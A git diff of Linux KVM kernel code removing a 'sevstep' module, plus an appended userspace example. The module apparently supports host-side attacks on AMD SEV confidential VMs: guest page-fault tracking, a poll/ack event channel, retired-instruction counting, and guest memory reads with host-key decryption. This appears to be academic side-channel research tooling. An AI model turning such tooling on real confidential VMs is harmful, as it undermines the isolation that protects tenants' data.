KVM_PAGE_TRACK_ACCESS) { - pr_warn("Removing gfn: %016llx from acess page track pool\n", gfn); - } - if (mode == KVM_PAGE_TRACK_WRITE) { - pr_warn("Removing gfn: %016llx from write page track pool\n", gfn); - } - - slot = kvm_vcpu_gfn_to_memslot(vcpu, gfn); - if (slot != NULL && kvm_slot_page_track_is_active(vcpu->kvm, slot, gfn, mode)) { - write_lock(&vcpu->kvm->mmu_lock); - kvm_slot_page_track_remove_page(vcpu->kvm, slot, gfn, mode); - write_unlock(&vcpu->kvm->mmu_lock); - ret = true; - } else { - pr_warn("Failed to untrack %016llx because ", gfn); - if (slot == NULL) { - printk(KERN_CONT "slot was null"); - } else if (!kvm_slot_page_track_is_active(vcpu->kvm, slot, gfn, mode)) { - printk(KERN_CONT "page track was not active"); - } - printk(KERN_CONT "\n"); - } - - srcu_read_unlock(&vcpu->kvm->srcu, idx); - - return ret; -} -EXPORT_SYMBOL(sevstep_untrack_single_page); - -bool -sevstep_reset_accessed_on_page(struct kvm_vcpu *vcpu, gfn_t gfn) -{ - int idx; - bool ret; - struct kvm_memory_slot *slot; - - ret = false; - idx = srcu_read_lock(&vcpu->kvm->srcu); - - slot = kvm_vcpu_gfn_to_memslot(vcpu, gfn); - if (slot != NULL) { - write_lock(&vcpu->kvm->mmu_lock); - // Vincent: The kvm mmu function now requires min_level - // We want all pages to protected so we do PG_LEVEL_4K - // https:// patchwork.kernel.org/project/kvm/patch/20210416082511.2856-2-zhukeqian1@huawei.com/ - sevstep_kvm_mmu_slot_gfn_protect(vcpu->kvm, slot, gfn, - PG_LEVEL_4K, KVM_PAGE_TRACK_RESET_ACCESSED); - write_unlock(&vcpu->kvm->mmu_lock); - ret = true; - } - - srcu_read_unlock(&vcpu->kvm->srcu, idx); - - return ret; -} -EXPORT_SYMBOL(sevstep_reset_accessed_on_page); - -bool -sevstep_clear_nx_on_page(struct kvm_vcpu *vcpu, gfn_t gfn) -{ - int idx; - bool ret; - struct kvm_memory_slot *slot; - - ret = false; - idx = srcu_read_lock(&vcpu->kvm->srcu); - - slot = kvm_vcpu_gfn_to_memslot(vcpu, gfn); - if 
(slot != NULL) { - write_lock(&vcpu->kvm->mmu_lock); - // Vincent: The kvm mmu function now requires min_level - // We want all pages to protected so we do PG_LEVEL_4K - // https:// patchwork.kernel.org/project/kvm/patch/20210416082511.2856-2-zhukeqian1@huawei.com/ - sevstep_kvm_mmu_slot_gfn_protect(vcpu->kvm, slot, gfn, - PG_LEVEL_4K, KVM_PAGE_TRACK_RESET_EXEC); - write_unlock(&vcpu->kvm->mmu_lock); - ret = true; - } - - srcu_read_unlock(&vcpu->kvm->srcu, idx); - - return ret; -} -EXPORT_SYMBOL(sevstep_clear_nx_on_page); - -long -sevstep_start_tracking(struct kvm_vcpu *vcpu, enum kvm_page_track_mode mode) -{ - struct kvm_memory_slot *slot; - struct kvm_memory_slot *first_memslot; - struct rb_node *node; - u64 iterator, iterat_max; - long count = 0; - int idx; - - // Vincent: Memslots interface changed into a rb tree, see - // here: https:// lwn.net/Articles/856392/ - // and here: https:// lore.kernel.org/all/cover.1632171478.git.maciej.szmigiero@oracle.com/T/#u - // Thus we use instead of - // iterat_max = vcpu->kvm->memslots[0]->memslots[0].base_gfn - // + vcpu->kvm->memslots[0]->memslots[0].npages; - node = rb_last(&(vcpu->kvm->memslots[0]->gfn_tree)); - first_memslot = container_of(node, struct kvm_memory_slot, gfn_node[0]); - iterat_max = first_memslot->base_gfn + first_memslot->npages; - for (iterator = 0; iterator < iterat_max; iterator++) - { - idx = srcu_read_lock(&vcpu->kvm->srcu); - slot = kvm_vcpu_gfn_to_memslot(vcpu, iterator); - if (slot != NULL && !kvm_slot_page_track_is_active(vcpu->kvm, slot, iterator, mode)) { - write_lock(&vcpu->kvm->mmu_lock); - kvm_slot_page_track_add_page(vcpu->kvm, slot, iterator, mode); - write_unlock(&vcpu->kvm->mmu_lock); - count++; - } - srcu_read_unlock(&vcpu->kvm->srcu, idx); - } - - return count; -} -EXPORT_SYMBOL(sevstep_start_tracking); - -long -sevstep_stop_tracking(struct kvm_vcpu *vcpu, enum kvm_page_track_mode mode) -{ - struct kvm_memory_slot *slot; - struct kvm_memory_slot *first_memslot; - struct rb_node *node; - u64 iterator, iterat_max; - long count = 0; - int idx; - - // Vincent: Memslots interface changed into a rb tree, see - // here: https:// lwn.net/Articles/856392/ - // and here: https:// lore.kernel.org/all/cover.1632171478.git.maciej.szmigiero@oracle.com/T/#u - // Thus we use instead of - // iterat_max = vcpu->kvm->memslots[0]->memslots[0].base_gfn - // + vcpu->kvm->memslots[0]->memslots[0].npages; - node = rb_last(&(vcpu->kvm->memslots[0]->gfn_tree)); - first_memslot = container_of(node, struct kvm_memory_slot, gfn_node[0]); - iterat_max = first_memslot->base_gfn + first_memslot->npages; - for (iterator=0; iterator < iterat_max; iterator++) - { - idx = srcu_read_lock(&vcpu->kvm->srcu); - slot = kvm_vcpu_gfn_to_memslot(vcpu, iterator); - // Vincent: I think see here - // https:// patchwork.kernel.org/project/kvm/patch/20210924163152.289027-22-pbonzini@redhat.com/ - if (slot != NULL && kvm_slot_page_track_is_active(vcpu->kvm, slot, iterator, mode)) { - write_lock(&vcpu->kvm->mmu_lock); - kvm_slot_page_track_remove_page(vcpu->kvm, slot, iterator, mode); - write_unlock(&vcpu->kvm->mmu_lock); - count++; - } - srcu_read_unlock(&vcpu->kvm->srcu, idx); - } - - return count; -} -EXPORT_SYMBOL(sevstep_stop_tracking); - -int -sevstep_get_rip_kvm_vcpu(struct kvm_vcpu *vcpu, uint64_t *rip) -{ - return 0; -} diff --git a/sevstep/uapi.h b/sevstep/uapi.h @@ -1,95 +0,0 @@ -#pragma once - -#include <linux/ioctl.h> -#include <linux/types.h> - -#define KVM_TRACK_PAGE _IOWR(KVMIO, 0x20, track_page_param_t) -#define KVM_USPT_REGISTER_PID 
_IOWR(KVMIO, 0x21, userspace_ctx_t) -#define KVM_USPT_WAIT_AND_SEND _IO(KVMIO, 0x22) -#define KVM_USPT_POLL_EVENT _IOWR(KVMIO, 0x23, page_fault_event_t) -#define KVM_USPT_ACK_EVENT _IOWR(KVMIO, 0x24, ack_event_t) -#define KVM_READ_GUEST_MEMORY _IOWR(KVMIO, 0x25, read_guest_memory_t) -#define KVM_USPT_RESET _IO(KVMIO, 0x26) -#define KVM_USPT_TRACK_ALL _IOWR(KVMIO, 0x27, track_all_pages_t) -#define KVM_USPT_UNTRACK_ALL _IOWR(KVMIO, 0x28, track_all_pages_t) -#define KVM_USPT_SETUP_RETINSTR_PERF _IOWR(KVMIO, 0x30, retired_instr_perf_config_t) -#define KVM_USPT_READ_RETINSTR_PERF _IOWR(KVMIO, 0x31, retired_instr_perf_t) -#define KVM_USPT_BATCH_TRACK_START _IOWR(KVMIO, 0x32, batch_track_config_t) -#define KVM_USPT_BATCH_TRACK_STOP _IOWR(KVMIO, 0x33, batch_track_stop_and_get_t) -#define KVM_USPT_BATCH_TRACK_EVENT_COUNT _IOWR(KVMIO, 0x34, batch_track_event_count_t) - -#define KVM_USPT_POLL_EVENT_NO_EVENT 1000 -#define KVM_USPT_POLL_EVENT_GOT_EVENT 0 - -enum kvm_page_track_mode { - KVM_PAGE_TRACK_WRITE, - KVM_PAGE_TRACK_ACCESS, - KVM_PAGE_TRACK_RESET_ACCESSED, - KVM_PAGE_TRACK_EXEC, - KVM_PAGE_TRACK_RESET_EXEC, - KVM_PAGE_TRACK_MAX, -}; - -typedef struct { - __u64 id; // filled automatically - __u64 faulted_gpa; - __u32 error_code; - __u8 have_rip_info; - __u64 rip; - __u64 ns_timestamp; - __u8 have_retired_instructions; - __u64 retired_instructions; -} page_fault_event_t; - -typedef struct { - __s32 tracking_type; - __u64 expected_events; - __s32 perf_cpu; - __u8 retrack; -} batch_track_config_t; - -typedef struct { - __u64 event_count; -} batch_track_event_count_t; - -typedef struct { - page_fault_event_t* out_buf; - __u64 len; - __u8 error_during_batch; -} batch_track_stop_and_get_t; - -typedef struct { - __s32 cpu; // cpu on which we want to read the counter - __u64 retired_instruction_count; // result param -} retired_instr_perf_t; - -typedef struct { - __s32 cpu; // cpu on which counter should be programmed -} retired_instr_perf_config_t; - -typedef struct { - __u64 gpa; - __u64 len; - __u8 decrypt_with_host_key; - __s32 wbinvd_cpu; // -1: do not flush; else logical cpu on which we flush - void *output_buffer; -} read_guest_memory_t; - -typedef struct { - __s32 pid; - __u8 get_rip; -} userspace_ctx_t; - -typedef struct { - __u64 id; -} ack_event_t; - -typedef struct { - __u64 gpa; - __s32 track_mode; -} track_page_param_t; - -typedef struct { - __s32 track_mode; -} track_all_pages_t; - diff --git a/sevstep/uspt.c b/sevstep/uspt.c @@ -1,489 +0,0 @@ -#include "uspt.h" -#include "sevstep.h" - -#include "svm/cachepc/cachepc.h" - -#include <linux/kvm.h> -#include <linux/timekeeping.h> -#include <linux/uaccess.h> -#include <linux/types.h> -#include <linux/vmalloc.h> -#include <linux/printk.h> -#include <linux/ratelimit.h> - -#define ARRLEN(x) (sizeof(x)/sizeof((x)[0])) - -typedef struct { - bool is_active; - int tracking_type; - bool retrack; - - int perf_cpu; - - uint64_t gfn_retrack_backlog[10]; - int gfn_retrack_backlog_next_idx; - - page_fault_event_t * events; - uint64_t event_next_idx; - uint64_t events_size; - - bool error_occured; -} batch_track_state_t; - -typedef struct { - uint64_t idx_for_last_perf_reading; - uint64_t last_perf_reading; - uint64_t delta_valid_idx; - uint64_t delta; -} perf_state_t; - -// crude sync mechanism. don't know a good way to act on errors yet. 
-static uint64_t last_sent_event_id = 1; -static uint64_t last_acked_event_id = 1; -DEFINE_RWLOCK(event_lock); - -static page_fault_event_t sent_event; -static int have_event = 0; - -static bool get_rip = true; - -static int inited = 0; - -DEFINE_SPINLOCK(batch_track_state_lock); -static batch_track_state_t batch_track_state; - -static perf_state_t perf_state; - -static uint64_t perf_state_update_and_get_delta(uint64_t current_event_idx); - -void -sevstep_uspt_clear(void) -{ - write_lock(&event_lock); - inited = 0; - last_sent_event_id = 1; - last_acked_event_id = 1; - have_event = 0; - get_rip = false; - write_unlock(&event_lock); -} - -int -sevstep_uspt_initialize(int pid, bool should_get_rip) -{ - write_lock(&event_lock); - inited = 1; - last_sent_event_id = 1; - last_acked_event_id = 1; - have_event = 0; - get_rip = should_get_rip; - write_unlock(&event_lock); - - return 0; -} - -int -sevstep_uspt_is_initialiized() -{ - return inited; -} - -bool -sevstep_uspt_should_get_rip() -{ - bool tmp; - - read_lock(&event_lock); - tmp = get_rip; - read_unlock(&event_lock); - - return tmp; -} - -int -sevstep_uspt_send_and_block(uint64_t faulted_gpa, uint32_t error_code, - bool have_rip, uint64_t rip) -{ - ktime_t abort_after; - page_fault_event_t message_for_user; - - read_lock(&event_lock); - if (!sevstep_uspt_is_initialiized()) { - pr_warn("sevstep_uspt_send_and_block: ctx not initialized!\n"); - read_unlock(&event_lock); - return 1; - } - read_unlock(&event_lock); - - write_lock(&event_lock); - if (last_sent_event_id != last_acked_event_id) { - pr_warn("sevstep_uspt_send_and_block: " - "event id_s out of sync, aborting. Fix this later\n"); - write_unlock(&event_lock); - return 1; - } else { - // TODO: handle overflow - last_sent_event_id++; - } - message_for_user.id = last_sent_event_id; - message_for_user.faulted_gpa = faulted_gpa; - message_for_user.error_code = error_code; - message_for_user.have_rip_info = have_rip; - message_for_user.rip = rip; - message_for_user.ns_timestamp = ktime_get_real_ns(); - message_for_user.have_retired_instructions = false; - - // for poll based system; - have_event = 1; - sent_event = message_for_user; - // printk("sevstep_uspt_send_and_block sending event %llu\n", sent_event.id); - - write_unlock(&event_lock); - - // wait for ack, but with timeout. 
Otherwise small bugs in userland - // easily lead to a kernel hang - abort_after = ktime_get() + 1000000000ULL; // 1 sec in nanosecond - while (!sevstep_uspt_is_event_done(sent_event.id)) { - if (ktime_get() > abort_after) { - pr_warn("sevstep_uspt_send_and_block: " - "Waiting for ack of event %llu timed out, " - "continuing\n",sent_event.id); - return 3; - } - } - - return 0; -} - -int -sevstep_uspt_is_event_done(uint64_t id) -{ - int res; - - read_lock(&event_lock); - res = last_acked_event_id >= id; - read_unlock(&event_lock); - - return res; -} - -int -sevstep_uspt_handle_poll_event(page_fault_event_t* userpace_mem) -{ - int err; - - // most of the time we won't have an event - read_lock(&event_lock); - if (!have_event) { - read_unlock(&event_lock); - return KVM_USPT_POLL_EVENT_NO_EVENT; - } - read_unlock(&event_lock); - - write_lock(&event_lock); - if (have_event) { - err = copy_to_user(userpace_mem, - &sent_event, sizeof(page_fault_event_t)); - have_event = 0; - } else { - err = KVM_USPT_POLL_EVENT_NO_EVENT; - } - write_unlock(&event_lock); - - return err; -} - -int -sevstep_uspt_handle_ack_event_ioctl(ack_event_t event) -{ - int err = 0; - - write_lock(&event_lock); - if (event.id == last_sent_event_id) { - last_acked_event_id = last_sent_event_id; - } else { - err = 1; - pr_warn("sevstep_uspt_handle_ack_event_ioctl: " - "last sent event id is %llu but received ack for %llu\n", - last_sent_event_id, event.id); - } - write_unlock(&event_lock); - - return err; -} - -// get retired instructions between current_event_idx-1 and current_event_idx -// value is cached for multiple calls to the same current_event_idx -uint64_t -perf_state_update_and_get_delta(uint64_t current_event_idx) -{ - uint64_t current_value; - - /* check if value is "cached" */ - if (perf_state.delta_valid_idx == current_event_idx) { - if (current_event_idx == 0) { - perf_state.idx_for_last_perf_reading = current_event_idx; - perf_state.last_perf_reading = cachepc_read_pmc(0); - } - return perf_state.delta; - } - - /* otherwise update, but logic is only valid for two consecutive events */ - if (current_event_idx != perf_state.idx_for_last_perf_reading+1) { - pr_warn("perf_state_update_and_get_delta: " - "last reading was for idx %llu but was queried for %llu\n", - perf_state.idx_for_last_perf_reading, current_event_idx); - } - - current_value = cachepc_read_pmc(0); - perf_state.delta = (current_value - perf_state.last_perf_reading); - perf_state.delta_valid_idx = current_event_idx; - - perf_state.idx_for_last_perf_reading = current_event_idx; - perf_state.last_perf_reading = current_value; - - return perf_state.delta; -} - -void -sevstep_uspt_batch_tracking_inc_event_idx(void) -{ - spin_lock(&batch_track_state_lock); - batch_track_state.event_next_idx++; - spin_unlock(&batch_track_state_lock); -} - -int -sevstep_uspt_batch_tracking_start(int tracking_type,uint64_t expected_events, - int perf_cpu, bool retrack) -{ - page_fault_event_t* events; - uint64_t buffer_size, i; - - spin_lock(&batch_track_state_lock); - if (batch_track_state.is_active) { - pr_warn("sevstep_uspt_batch_tracking_start: " - "overwriting active batch track config!\n"); - if (batch_track_state.events != NULL ) { - vfree(batch_track_state.events); - } - } - batch_track_state.is_active = false; - spin_unlock(&batch_track_state_lock); - - buffer_size = expected_events * sizeof(page_fault_event_t); - pr_warn("sevstep_uspt_batch_tracking_start: " - "trying to alloc %llu bytes buffer for events\n", - buffer_size); - events = vmalloc(buffer_size); - if 
(events == NULL) {
-		pr_warn("sevstep_uspt_batch_tracking_start: "
-			"failed to alloc %llu bytes for event buffer\n",
-			buffer_size);
-		return 1; // note: lock not held here
-	}
-
-	// access each element once to force the buffer into memory,
-	// improving performance during tracking
-	for (i = 0; i < expected_events * sizeof(page_fault_event_t); i++) {
-		((volatile uint8_t*)events)[i] = 0;
-	}
-
-	perf_state.idx_for_last_perf_reading = 0;
-	perf_state.last_perf_reading = 0;
-	perf_state.delta_valid_idx = 0;
-	perf_state.delta = 0;
-	cachepc_init_pmc(0, 0xc0, 0x00, PMC_GUEST, PMC_KERNEL | PMC_USER);
-
-	spin_lock(&batch_track_state_lock);
-
-	batch_track_state.perf_cpu = perf_cpu;
-	batch_track_state.retrack = retrack;
-
-	batch_track_state.events = events;
-	batch_track_state.event_next_idx = 0;
-	batch_track_state.events_size = expected_events;
-
-	batch_track_state.gfn_retrack_backlog_next_idx = 0;
-	batch_track_state.tracking_type = tracking_type;
-	batch_track_state.error_occured = false;
-
-	batch_track_state.is_active = true;
-
-	spin_unlock(&batch_track_state_lock);
-
-	return 0;
-}
-
-void
-sevstep_uspt_batch_tracking_handle_retrack(struct kvm_vcpu* vcpu,
-	uint64_t current_fault_gfn)
-{
-	uint64_t ret_instr_delta;
-	int i, next_idx;
-
-	spin_lock(&batch_track_state_lock);
-
-	if (!batch_track_state.retrack) {
-		spin_unlock(&batch_track_state_lock);
-		return;
-	}
-
-	if (smp_processor_id() != batch_track_state.perf_cpu) {
-		pr_warn("sevstep_uspt_batch_tracking_handle_retrack: perf was "
-			"programmed on logical cpu %d but handler was called "
-			"on %d. Did you forget to pin the vcpu thread?\n",
			batch_track_state.perf_cpu, smp_processor_id());
-	}
-	ret_instr_delta = perf_state_update_and_get_delta(batch_track_state.event_next_idx);
-
-	// the faulting instruction is probably the same as on the last fault:
-	// try to add the current fault to the retrack log and return.
-	// For the first event idx we do not have a valid ret_instr_delta.
-	// Retracking for the first time is fine; if we loop, we end up here
-	// again, but with a valid delta on one of the next events
-	if ((ret_instr_delta < 2) && (batch_track_state.event_next_idx != 0)) {
-		next_idx = batch_track_state.gfn_retrack_backlog_next_idx;
-		if (next_idx >= ARRLEN(batch_track_state.gfn_retrack_backlog)) {
-			pr_warn("sevstep_uspt_batch_tracking_handle_retrack: "
-				"retrack backlog full, dropping retrack for fault "
-				"at 0x%llx\n", current_fault_gfn);
-		} else {
-			batch_track_state.gfn_retrack_backlog[next_idx] = current_fault_gfn;
-			batch_track_state.gfn_retrack_backlog_next_idx++;
-		}
-
-		spin_unlock(&batch_track_state_lock);
-		return;
-	}
-
-	/* made progress, retrack everything in backlog and reset idx */
-	for (i = 0; i < batch_track_state.gfn_retrack_backlog_next_idx; i++) {
-		sevstep_track_single_page(vcpu,
-			batch_track_state.gfn_retrack_backlog[i],
-			batch_track_state.tracking_type);
-	}
-
-	/* add current fault to list */
-	batch_track_state.gfn_retrack_backlog[0] = current_fault_gfn;
-	batch_track_state.gfn_retrack_backlog_next_idx = 1;
-
-	spin_unlock(&batch_track_state_lock);
-}
-
-int
-sevstep_uspt_batch_tracking_save(uint64_t faulted_gpa, uint32_t error_code,
-	bool have_rip, uint64_t rip)
-{
-	uint64_t ret_instr_delta;
-	page_fault_event_t* event;
-
-	spin_lock(&batch_track_state_lock);
-
-	if (!batch_track_state.is_active) {
-		pr_warn("sevstep_uspt_batch_tracking_save: "
-			"got save but batch tracking is not active!\n");
-		batch_track_state.error_occured = true;
-		spin_unlock(&batch_track_state_lock);
-		return 1;
-	}
-
-	if (batch_track_state.event_next_idx >= batch_track_state.events_size) {
-		pr_warn("sevstep_uspt_batch_tracking_save: events buffer is full!\n");
-		batch_track_state.error_occured = true;
-		spin_unlock(&batch_track_state_lock);
-		return 1;
-	}
-
-	if (smp_processor_id() != batch_track_state.perf_cpu) {
-		pr_warn("sevstep_uspt_batch_tracking_save: perf was "
-			"programmed on logical cpu %d but handler was called "
-			"on %d. Did you forget to pin the vcpu thread?\n",
			batch_track_state.perf_cpu, smp_processor_id());
-	}
-	ret_instr_delta = perf_state_update_and_get_delta(batch_track_state.event_next_idx);
-
-	if (batch_track_state.events == NULL) {
-		pr_warn("sevstep_uspt_batch_tracking_save: events buf was "
-			"NULL but \"is_active\" was set! This should never happen!\n");
-		spin_unlock(&batch_track_state_lock);
-		return 1;
-	}
-
-	event = &batch_track_state.events[batch_track_state.event_next_idx];
-	event->id = batch_track_state.event_next_idx;
-	event->faulted_gpa = faulted_gpa;
-	event->error_code = error_code;
-	event->have_rip_info = have_rip;
-	event->rip = rip;
-	event->ns_timestamp = ktime_get_real_ns();
-	event->have_retired_instructions = true;
-	event->retired_instructions = ret_instr_delta;
-
-	// old inc was here
-
-	if (batch_track_state.gfn_retrack_backlog_next_idx
-		> ARRLEN(batch_track_state.gfn_retrack_backlog)) {
-		pr_warn("sevstep_uspt_batch_tracking_save: "
-			"gfn retrack backlog overflow!\n");
-		batch_track_state.error_occured = true;
-		spin_unlock(&batch_track_state_lock);
-		return 1;
-	}
-
-	spin_unlock(&batch_track_state_lock);
-
-	return 0;
-}
-
-int
-sevstep_uspt_batch_tracking_stop(page_fault_event_t* results,
-	uint64_t len, __u8* error_occured)
-{
-	spin_lock(&batch_track_state_lock);
-	if (!batch_track_state.is_active) {
-		pr_warn("sevstep_uspt: batch tracking not active\n");
-		spin_unlock(&batch_track_state_lock);
-		return 1;
-	}
-	batch_track_state.is_active = false;
-
-	if (len > batch_track_state.event_next_idx) {
-		pr_warn("sevstep_uspt_batch_tracking_stop: "
-			"requested %llu events but got only %llu\n",
-			len, batch_track_state.event_next_idx);
-		spin_unlock(&batch_track_state_lock);
-		return 1;
-	}
-
-	memcpy(results, batch_track_state.events, len * sizeof(page_fault_event_t));
-	vfree(batch_track_state.events);
-
-	*error_occured = batch_track_state.error_occured;
-
-	spin_unlock(&batch_track_state_lock);
-
-	return 0;
-}
-
-uint64_t
-sevstep_uspt_batch_tracking_get_events_count()
-{
-	uint64_t buf;
-
-	spin_lock(&batch_track_state_lock);
-	buf = batch_track_state.event_next_idx;
-	spin_unlock(&batch_track_state_lock);
-
-	return buf;
-}
-
-bool
-sevstep_uspt_batch_tracking_in_progress()
-{
-	return batch_track_state.is_active;
-}
diff --git a/test/sevstep.c b/test/sevstep.c
@@ -1,4 +1,4 @@
-#include "sevstep/uapi.h"
+#include "cachepc/uapi.h"
 #include <linux/kvm.h>
 #include <sys/ioctl.h>
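
For context, a minimal userspace sketch (not part of this commit) of how the track/poll/ack flow declared in cachepc/uapi.h might be driven. The use of /dev/kvm as the ioctl target, the tracked gpa, and the assumption that kvm.c passes the handlers' status codes (e.g. KVM_USPT_POLL_EVENT_NO_EVENT) straight through are illustrative guesses; the actual wiring depends on patch.diff.

/* sketch: register, track one gpa, then poll and ack page-fault events */
#include "cachepc/uapi.h"

#include <linux/kvm.h>
#include <sys/ioctl.h>
#include <fcntl.h>
#include <unistd.h>
#include <stdio.h>

int
main(void)
{
	userspace_ctx_t ctx;
	track_page_param_t track;
	page_fault_event_t event;
	ack_event_t ack;
	int fd, ret;

	fd = open("/dev/kvm", O_RDWR); /* assumed ioctl target */
	if (fd < 0) return 1;

	/* register this process and request rip info (sevstep_uspt_initialize) */
	ctx.pid = getpid();
	ctx.get_rip = 1;
	ioctl(fd, KVM_USPT_REGISTER_PID, &ctx);

	/* track accesses to one (hypothetical) guest-physical page */
	track.gpa = 0x1000;
	track.track_mode = KVM_PAGE_TRACK_ACCESS;
	ioctl(fd, KVM_TRACK_PAGE, &track);

	/* poll until sevstep_uspt_send_and_block publishes an event,
	 * then ack it so the vcpu thread stops spinning */
	while (1) {
		ret = ioctl(fd, KVM_USPT_POLL_EVENT, &event);
		if (ret == KVM_USPT_POLL_EVENT_NO_EVENT) continue;
		if (ret) break;

		printf("fault at gpa %016llx (id %llu)\n",
			event.faulted_gpa, event.id);

		ack.id = event.id;
		ioctl(fd, KVM_USPT_ACK_EVENT, &ack);
	}

	close(fd);

	return 0;
}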